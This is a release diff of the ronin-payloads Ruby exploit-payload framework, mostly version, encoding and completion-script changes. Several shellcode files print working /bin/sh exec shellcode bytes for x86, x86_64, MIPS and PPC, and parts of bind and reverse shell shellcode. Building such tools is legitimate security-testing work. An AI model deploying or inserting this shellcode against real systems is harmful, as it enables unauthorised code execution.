ronin-payloads 0.2.0.rc1 → 0.2.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/.rubocop.yml +3 -0
- data/.ruby-version +1 -1
- data/ChangeLog.md +8 -1
- data/README.md +17 -10
- data/data/completions/ronin-payloads +33 -33
- data/gemspec.yml +1 -1
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86_64/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/arm/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/arm/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/arm/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/mips/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/mips/exec_shell.rb +13 -12
- data/lib/ronin/payloads/builtin/shellcode/linux/mips/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb +15 -14
- data/lib/ronin/payloads/builtin/shellcode/linux/ppc/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/exec_shell.rb +11 -10
- data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/exec_shell.rb +13 -12
- data/lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb +21 -20
- data/lib/ronin/payloads/builtin/test/cmd.rb +1 -1
- data/lib/ronin/payloads/builtin/test/open_redirect.rb +4 -1
- data/lib/ronin/payloads/builtin/test/url.rb +1 -1
- data/lib/ronin/payloads/builtin/test/xss.rb +4 -1
- data/lib/ronin/payloads/cli.rb +2 -0
- data/lib/ronin/payloads/version.rb +1 -1
- metadata +5 -5
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 652a98c495b84d3a9c198fb5c9c7a2cde8fe6b2d55439e6a62cb6b8e39c56e35
|
|
4
|
+
data.tar.gz: 03f33b7a86f0990b27d1e5f72a08222b3da758f20c275a9b78251aec24289ccd
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: f24494cee6f75c9d3fc56a5ff006d4c1923420cd7129707ad1eb88e01c2c9ce92a7739cbc4aab0010291a771589b8e90098fc6a9647ab340fe6071c30bfed863
|
|
7
|
+
data.tar.gz: f455db818586a0c15148ecc318bded23a0295fca56faf56d5f01dfd74798ede1c358bff28f033d77f4b38cb7710f3477b8a4c6d9283d1206a7b76d5e49bafc69
|
data/.rubocop.yml
CHANGED
data/.ruby-version
CHANGED
|
@@ -1 +1 @@
|
|
|
1
|
-
ruby-3.
|
|
1
|
+
ruby-3.3
|
data/ChangeLog.md
CHANGED
|
@@ -1,4 +1,4 @@
|
|
|
1
|
-
### 0.2.0 / 2024-
|
|
1
|
+
### 0.2.0 / 2024-07-22
|
|
2
2
|
|
|
3
3
|
* Added the {Ronin::Payloads::GroovyPayload} payload class.
|
|
4
4
|
* Added the {Ronin::Payloads::NashornPayload} payload class.
|
|
@@ -43,6 +43,13 @@
|
|
|
43
43
|
`ronin-payloads build` command for the given payload.
|
|
44
44
|
* Renamed the `-e` option flag to `-E` in `ronin-payloads build`.
|
|
45
45
|
|
|
46
|
+
### 0.1.6 / 2024-07-01
|
|
47
|
+
|
|
48
|
+
#### Payloads
|
|
49
|
+
|
|
50
|
+
* Fixed `incompatible character encodings: UTF-8 and ASCII-8BIT` exceptions when
|
|
51
|
+
building shellcode payloads with certain IP addresses or port numbers.
|
|
52
|
+
|
|
46
53
|
### 0.1.5 / 2024-06-19
|
|
47
54
|
|
|
48
55
|
* Fixed order of arguments passed to `TCPServer.new` in
|
data/README.md
CHANGED
|
@@ -126,13 +126,17 @@ $ ronin-payloads list
|
|
|
126
126
|
cmd/awk/reverse_shell
|
|
127
127
|
cmd/bash/reverse_shell
|
|
128
128
|
cmd/lua/reverse_shell
|
|
129
|
+
cmd/netcat/bind_shell
|
|
129
130
|
cmd/node/reverse_shell
|
|
130
131
|
cmd/openssl/reverse_shell
|
|
131
132
|
cmd/perl/reverse_shell
|
|
132
133
|
cmd/php/reverse_shell
|
|
134
|
+
cmd/ping
|
|
133
135
|
cmd/powershell/reverse_shell
|
|
134
136
|
cmd/python/reverse_shell
|
|
135
137
|
cmd/ruby/reverse_shell
|
|
138
|
+
cmd/sleep
|
|
139
|
+
cmd/touch
|
|
136
140
|
cmd/windows/download
|
|
137
141
|
cmd/zsh/reverse_shell
|
|
138
142
|
groovy/reverse_shell
|
|
@@ -142,31 +146,33 @@ $ ronin-payloads list
|
|
|
142
146
|
php/cmd_exec
|
|
143
147
|
php/download_exec
|
|
144
148
|
shellcode/freebsd/x86/bind_shell
|
|
145
|
-
shellcode/freebsd/x86/
|
|
149
|
+
shellcode/freebsd/x86/exec_shell
|
|
146
150
|
shellcode/freebsd/x86/reverse_shell
|
|
147
|
-
shellcode/freebsd/x86_64/
|
|
151
|
+
shellcode/freebsd/x86_64/exec_shell
|
|
148
152
|
shellcode/linux/arm/bind_shell
|
|
149
|
-
shellcode/linux/arm/
|
|
153
|
+
shellcode/linux/arm/exec_shell
|
|
150
154
|
shellcode/linux/arm/reverse_shell
|
|
151
155
|
shellcode/linux/mips/bind_shell
|
|
152
|
-
shellcode/linux/mips/
|
|
156
|
+
shellcode/linux/mips/exec_shell
|
|
153
157
|
shellcode/linux/mips/reverse_shell
|
|
154
|
-
shellcode/linux/ppc/
|
|
158
|
+
shellcode/linux/ppc/exec_shell
|
|
155
159
|
shellcode/linux/ppc/reverse_shell
|
|
156
160
|
shellcode/linux/x86/bind_shell
|
|
157
|
-
shellcode/linux/x86/
|
|
161
|
+
shellcode/linux/x86/exec_shell
|
|
158
162
|
shellcode/linux/x86/reverse_shell
|
|
159
163
|
shellcode/linux/x86_64/bind_shell
|
|
160
|
-
shellcode/linux/x86_64/
|
|
164
|
+
shellcode/linux/x86_64/exec_shell
|
|
161
165
|
shellcode/linux/x86_64/reverse_shell
|
|
162
|
-
shellcode/macos/x86_64/
|
|
166
|
+
shellcode/macos/x86_64/exec_shell
|
|
163
167
|
shellcode/macos/x86_64/reverse_shell
|
|
164
|
-
shellcode/netbsd/x86/
|
|
168
|
+
shellcode/netbsd/x86/exec_shell
|
|
165
169
|
shellcode/netbsd/x86/reverse_shell
|
|
166
170
|
shellcode/openbsd/x86/bind_shell
|
|
167
|
-
shellcode/openbsd/x86/
|
|
171
|
+
shellcode/openbsd/x86/exec_shell
|
|
168
172
|
shellcode/windows/x86_64/cmd
|
|
173
|
+
test/cmd
|
|
169
174
|
test/open_redirect
|
|
175
|
+
test/url
|
|
170
176
|
test/xss
|
|
171
177
|
```
|
|
172
178
|
|
|
@@ -234,6 +240,7 @@ $ git push
|
|
|
234
240
|
Define a `/bin/sh` shellcode payload:
|
|
235
241
|
|
|
236
242
|
```ruby
|
|
243
|
+
# encoding: ASCII-8BIT
|
|
237
244
|
require 'ronin/payloads/shellcode_payload'
|
|
238
245
|
|
|
239
246
|
module Ronin
|
|
@@ -11,7 +11,7 @@ _ronin-payloads_completions_filter() {
|
|
|
11
11
|
|
|
12
12
|
if [[ "${cur:0:1}" == "-" ]]; then
|
|
13
13
|
echo "$words"
|
|
14
|
-
|
|
14
|
+
|
|
15
15
|
else
|
|
16
16
|
for word in $words; do
|
|
17
17
|
[[ "${word:0:1}" != "-" ]] && result+=("$word")
|
|
@@ -29,99 +29,99 @@ _ronin-payloads_completions() {
|
|
|
29
29
|
|
|
30
30
|
case "$compline" in
|
|
31
31
|
'encode'*'--encoder')
|
|
32
|
-
while read -r; do COMPREPLY+=(
|
|
32
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads encoders)")" -- "$cur")
|
|
33
33
|
;;
|
|
34
34
|
|
|
35
35
|
'build'*'--encoder')
|
|
36
|
-
while read -r; do COMPREPLY+=(
|
|
36
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads encoders)")" -- "$cur")
|
|
37
37
|
;;
|
|
38
38
|
|
|
39
39
|
'build'*'--output')
|
|
40
|
-
while read -r; do COMPREPLY+=(
|
|
40
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
|
41
41
|
;;
|
|
42
42
|
|
|
43
43
|
'encoder'*'--file')
|
|
44
|
-
while read -r; do COMPREPLY+=(
|
|
44
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
|
45
45
|
;;
|
|
46
46
|
|
|
47
47
|
'launch'*'--file')
|
|
48
|
-
while read -r; do COMPREPLY+=(
|
|
48
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
|
49
49
|
;;
|
|
50
50
|
|
|
51
51
|
'build'*'--file')
|
|
52
|
-
while read -r; do COMPREPLY+=(
|
|
52
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
|
53
53
|
;;
|
|
54
54
|
|
|
55
55
|
'show'*'--file')
|
|
56
|
-
while read -r; do COMPREPLY+=(
|
|
56
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
|
57
57
|
;;
|
|
58
58
|
|
|
59
59
|
'completion'*)
|
|
60
|
-
while read -r; do COMPREPLY+=(
|
|
60
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--print --install --uninstall")" -- "$cur")
|
|
61
61
|
;;
|
|
62
62
|
|
|
63
63
|
'encoder'*'-f')
|
|
64
|
-
while read -r; do COMPREPLY+=(
|
|
64
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
|
65
65
|
;;
|
|
66
66
|
|
|
67
|
-
'
|
|
68
|
-
while read -r; do COMPREPLY+=(
|
|
67
|
+
'encode'*'-E')
|
|
68
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads encoders)")" -- "$cur")
|
|
69
69
|
;;
|
|
70
70
|
|
|
71
|
-
'
|
|
72
|
-
while read -r; do COMPREPLY+=(
|
|
71
|
+
'launch'*'-f')
|
|
72
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
|
73
73
|
;;
|
|
74
74
|
|
|
75
|
-
'build'*'-
|
|
76
|
-
while read -r; do COMPREPLY+=(
|
|
75
|
+
'build'*'-E')
|
|
76
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads encoders)")" -- "$cur")
|
|
77
77
|
;;
|
|
78
78
|
|
|
79
79
|
'build'*'-o')
|
|
80
|
-
while read -r; do COMPREPLY+=(
|
|
80
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
|
81
81
|
;;
|
|
82
82
|
|
|
83
|
-
'build'*'-
|
|
84
|
-
while read -r; do COMPREPLY+=(
|
|
83
|
+
'build'*'-f')
|
|
84
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
|
85
85
|
;;
|
|
86
86
|
|
|
87
87
|
'encoder'*)
|
|
88
|
-
while read -r; do COMPREPLY+=(
|
|
88
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--verbose -v --file -f $(ronin-payloads encoders)")" -- "$cur")
|
|
89
89
|
;;
|
|
90
90
|
|
|
91
91
|
'show'*'-f')
|
|
92
|
-
while read -r; do COMPREPLY+=(
|
|
92
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
|
93
93
|
;;
|
|
94
94
|
|
|
95
|
-
'
|
|
96
|
-
while read -r; do COMPREPLY+=(
|
|
95
|
+
'launch'*)
|
|
96
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--file -f --param -p --debug -D $(ronin-payloads list)")" -- "$cur")
|
|
97
97
|
;;
|
|
98
98
|
|
|
99
|
-
'
|
|
100
|
-
while read -r; do COMPREPLY+=(
|
|
99
|
+
'encode'*)
|
|
100
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--format -F --encoder -E --param -p --string -s")" -- "$cur")
|
|
101
101
|
;;
|
|
102
102
|
|
|
103
103
|
'build'*)
|
|
104
|
-
while read -r; do COMPREPLY+=(
|
|
104
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--file -f --format -F --param -p --output -o --encoder -E --encoder-param --debug -D $(ronin-payloads list)")" -- "$cur")
|
|
105
105
|
;;
|
|
106
106
|
|
|
107
|
-
'
|
|
108
|
-
while read -r; do COMPREPLY+=(
|
|
107
|
+
'info'*)
|
|
108
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads list)")" -- "$cur")
|
|
109
109
|
;;
|
|
110
110
|
|
|
111
|
-
'
|
|
112
|
-
while read -r; do COMPREPLY+=(
|
|
111
|
+
'show'*)
|
|
112
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--file -f --verbose -v $(ronin-payloads list)")" -- "$cur")
|
|
113
113
|
;;
|
|
114
114
|
|
|
115
115
|
'new'*)
|
|
116
|
-
while read -r; do COMPREPLY+=(
|
|
116
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--type -t --author -a --author-email -e --summary -S --description -D --reference -R")" -- "$cur")
|
|
117
117
|
;;
|
|
118
118
|
|
|
119
119
|
*)
|
|
120
|
-
while read -r; do COMPREPLY+=(
|
|
120
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--version -V help build completion encode encoder encoders irb launch list new show ls info")" -- "$cur")
|
|
121
121
|
;;
|
|
122
122
|
|
|
123
123
|
esac
|
|
124
124
|
} &&
|
|
125
|
-
complete -F _ronin-payloads_completions ronin-payloads
|
|
125
|
+
complete -F _ronin-payloads_completions ronin-payloads
|
|
126
126
|
|
|
127
127
|
# ex: filetype=sh
|
data/gemspec.yml
CHANGED
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -58,7 +59,7 @@ module Ronin
|
|
|
58
59
|
"\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff" \
|
|
59
60
|
"\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01" \
|
|
60
61
|
"\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff" \
|
|
61
|
-
"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"
|
|
62
|
+
"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"
|
|
62
63
|
end
|
|
63
64
|
|
|
64
65
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -53,7 +54,7 @@ module Ronin
|
|
|
53
54
|
def build
|
|
54
55
|
@payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68" \
|
|
55
56
|
"\x68\x2f\x62\x69\x6e\x89\xe3\x50" \
|
|
56
|
-
"\x54\x53\xb0\x3b\x50\xcd\x80"
|
|
57
|
+
"\x54\x53\xb0\x3b\x50\xcd\x80"
|
|
57
58
|
end
|
|
58
59
|
|
|
59
60
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -56,7 +57,7 @@ module Ronin
|
|
|
56
57
|
"\xe1\x6a\x10\x51\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc9" \
|
|
57
58
|
"\x51\x52\x31\xc0\xb0\x5a\x50\xcd\x80\xfe\xc1\x80\xf9\x03" \
|
|
58
59
|
"\x75\xf0\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" \
|
|
59
|
-
"\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"
|
|
60
|
+
"\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"
|
|
60
61
|
end
|
|
61
62
|
|
|
62
63
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -53,7 +54,7 @@ module Ronin
|
|
|
53
54
|
def build
|
|
54
55
|
@payload = "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb" \
|
|
55
56
|
"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53" \
|
|
56
|
-
"\x54\x5f\x52\x57\x54\x5e\x0f\x05"
|
|
57
|
+
"\x54\x5f\x52\x57\x54\x5e\x0f\x05"
|
|
57
58
|
end
|
|
58
59
|
|
|
59
60
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -119,7 +120,7 @@ module Ronin
|
|
|
119
120
|
"\x08\x00\x8d\xe2" \
|
|
120
121
|
"\x00\x10\x8d\xe2" \
|
|
121
122
|
"\x04\x20\x8d\xe2" \
|
|
122
|
-
"\x0b\x00\x90\xef"
|
|
123
|
+
"\x0b\x00\x90\xef"
|
|
123
124
|
end
|
|
124
125
|
|
|
125
126
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -60,7 +61,7 @@ module Ronin
|
|
|
60
61
|
"\xc2\x51\x03\x37" \
|
|
61
62
|
"\x01\xdf\x2f\x62" \
|
|
62
63
|
"\x69\x6e\x2f\x2f" \
|
|
63
|
-
"\x73\x68"
|
|
64
|
+
"\x73\x68"
|
|
64
65
|
end
|
|
65
66
|
|
|
66
67
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -72,7 +73,7 @@ module Ronin
|
|
|
72
73
|
"#{packed_port}" \
|
|
73
74
|
"#{packed_ipv4}" \
|
|
74
75
|
\
|
|
75
|
-
"/bin/sh\0"
|
|
76
|
+
"/bin/sh\0"
|
|
76
77
|
end
|
|
77
78
|
|
|
78
79
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -118,7 +119,7 @@ module Ronin
|
|
|
118
119
|
"\xf0\xff\xa5\x23" \
|
|
119
120
|
"\xab\x0f\x02\x24" \
|
|
120
121
|
"\x0c\x01\x01\x01" \
|
|
121
|
-
"/bin/sh"
|
|
122
|
+
"/bin/sh"
|
|
122
123
|
end
|
|
123
124
|
|
|
124
125
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -51,18 +52,18 @@ module Ronin
|
|
|
51
52
|
# Builds the shellcode.
|
|
52
53
|
#
|
|
53
54
|
def build
|
|
54
|
-
@payload = "\x28\x06\xff\xff"
|
|
55
|
-
"\x3c\x0f\x2f\x2f"
|
|
56
|
-
"\x35\xef\x62\x69"
|
|
57
|
-
"\xaf\xaf\xff\xf4"
|
|
58
|
-
"\x3c\x0e\x6e\x2f"
|
|
59
|
-
"\x35\xce\x73\x68"
|
|
60
|
-
"\xaf\xae\xff\xf8"
|
|
61
|
-
"\xaf\xa0\xff\xfc"
|
|
62
|
-
"\x27\xa4\xff\xf4"
|
|
63
|
-
"\x28\x05\xff\xff"
|
|
64
|
-
"\x24\x02\x0f\xab"
|
|
65
|
-
"\x01\x01\x01\x0c"
|
|
55
|
+
@payload = "\x28\x06\xff\xff" + # slti a2,zero,-1
|
|
56
|
+
"\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f
|
|
57
|
+
"\x35\xef\x62\x69" + # ori t7,t7,0x6269
|
|
58
|
+
"\xaf\xaf\xff\xf4" + # sw t7,-12(sp)
|
|
59
|
+
"\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f
|
|
60
|
+
"\x35\xce\x73\x68" + # ori t6,t6,0x7368
|
|
61
|
+
"\xaf\xae\xff\xf8" + # sw t6,-8(sp)
|
|
62
|
+
"\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
|
|
63
|
+
"\x27\xa4\xff\xf4" + # addiu a0,sp,-12
|
|
64
|
+
"\x28\x05\xff\xff" + # slti a1,zero,-1
|
|
65
|
+
"\x24\x02\x0f\xab" + # li v0,4011
|
|
66
|
+
"\x01\x01\x01\x0c" # syscall 0x40404
|
|
66
67
|
end
|
|
67
68
|
|
|
68
69
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -100,7 +101,7 @@ module Ronin
|
|
|
100
101
|
"\x27\xa4\xff\xf4" \
|
|
101
102
|
"\x28\x05\xff\xff" \
|
|
102
103
|
"\x24\x02\x0f\xab" \
|
|
103
|
-
"\x01\x01\x01\x0c"
|
|
104
|
+
"\x01\x01\x01\x0c"
|
|
104
105
|
end
|
|
105
106
|
|
|
106
107
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -51,20 +52,20 @@ module Ronin
|
|
|
51
52
|
# Builds the shellcode.
|
|
52
53
|
#
|
|
53
54
|
def build
|
|
54
|
-
@payload = "\x7c\x3f\x0b\x78"
|
|
55
|
-
"\x7c\xa5\x2a\x79"
|
|
56
|
-
"\x42\x40\xff\xf9"
|
|
57
|
-
"\x7f\x08\x02\xa6"
|
|
58
|
-
"\x3b\x18\x01\x34"
|
|
59
|
-
"\x98\xb8\xfe\xfb"
|
|
60
|
-
"\x38\x78\xfe\xf4"
|
|
61
|
-
"\x90\x61\xff\xf8"
|
|
62
|
-
"\x38\x81\xff\xf8"
|
|
63
|
-
"\x90\xa1\xff\xfc"
|
|
64
|
-
"\x3b\xc0\x01\x60"
|
|
65
|
-
"\x7f\xc0\x2e\x70"
|
|
66
|
-
"\x44\xde\xad\xf2"
|
|
67
|
-
"/bin/shZ"
|
|
55
|
+
@payload = "\x7c\x3f\x0b\x78" + # mr r31,r1
|
|
56
|
+
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5
|
|
57
|
+
"\x42\x40\xff\xf9" + # bdzl+ 10000454< main>
|
|
58
|
+
"\x7f\x08\x02\xa6" + # mflr r24
|
|
59
|
+
"\x3b\x18\x01\x34" + # addi r24,r24,308
|
|
60
|
+
"\x98\xb8\xfe\xfb" + # stb r5,-261(r24)
|
|
61
|
+
"\x38\x78\xfe\xf4" + # addi r3,r24,-268
|
|
62
|
+
"\x90\x61\xff\xf8" + # stw r3,-8(r1)
|
|
63
|
+
"\x38\x81\xff\xf8" + # addi r4,r1,-8
|
|
64
|
+
"\x90\xa1\xff\xfc" + # stw r5,-4(r1)
|
|
65
|
+
"\x3b\xc0\x01\x60" + # li r30,352
|
|
66
|
+
"\x7f\xc0\x2e\x70" + # srawi r0,r30,5
|
|
67
|
+
"\x44\xde\xad\xf2" + # .long 0x44deadf2
|
|
68
|
+
"/bin/shZ" # the last byte becomes NULL
|
|
68
69
|
end
|
|
69
70
|
|
|
70
71
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -125,7 +126,7 @@ module Ronin
|
|
|
125
126
|
"\x3b\xc0\x01\x60" \
|
|
126
127
|
"\x7f\xc0\x2e\x70" \
|
|
127
128
|
"\x44\xde\xad\xf2" \
|
|
128
|
-
"/bin/shZ"
|
|
129
|
+
"/bin/shZ"
|
|
129
130
|
end
|
|
130
131
|
|
|
131
132
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -98,7 +99,7 @@ module Ronin
|
|
|
98
99
|
"\x68\x2f\x62\x69\x6e" \
|
|
99
100
|
"\x89\xe3" \
|
|
100
101
|
"\xb0\x0b" \
|
|
101
|
-
"\xcd\x80"
|
|
102
|
+
"\xcd\x80"
|
|
102
103
|
end
|
|
103
104
|
|
|
104
105
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -54,7 +55,7 @@ module Ronin
|
|
|
54
55
|
def build
|
|
55
56
|
@payload = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f" \
|
|
56
57
|
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd" \
|
|
57
|
-
"\x80"
|
|
58
|
+
"\x80"
|
|
58
59
|
end
|
|
59
60
|
|
|
60
61
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -62,7 +63,7 @@ module Ronin
|
|
|
62
63
|
"\xc0\x52\x68\x6e\x2f\x73\x68\x68" \
|
|
63
64
|
"\x2f\x2f\x62\x69\x89\xe3\x52\x53" \
|
|
64
65
|
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd" \
|
|
65
|
-
"\x80"
|
|
66
|
+
"\x80"
|
|
66
67
|
end
|
|
67
68
|
|
|
68
69
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -59,7 +60,7 @@ module Ronin
|
|
|
59
60
|
"\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" \
|
|
60
61
|
"\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" \
|
|
61
62
|
"\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" \
|
|
62
|
-
"\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"
|
|
63
|
+
"\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"
|
|
63
64
|
end
|
|
64
65
|
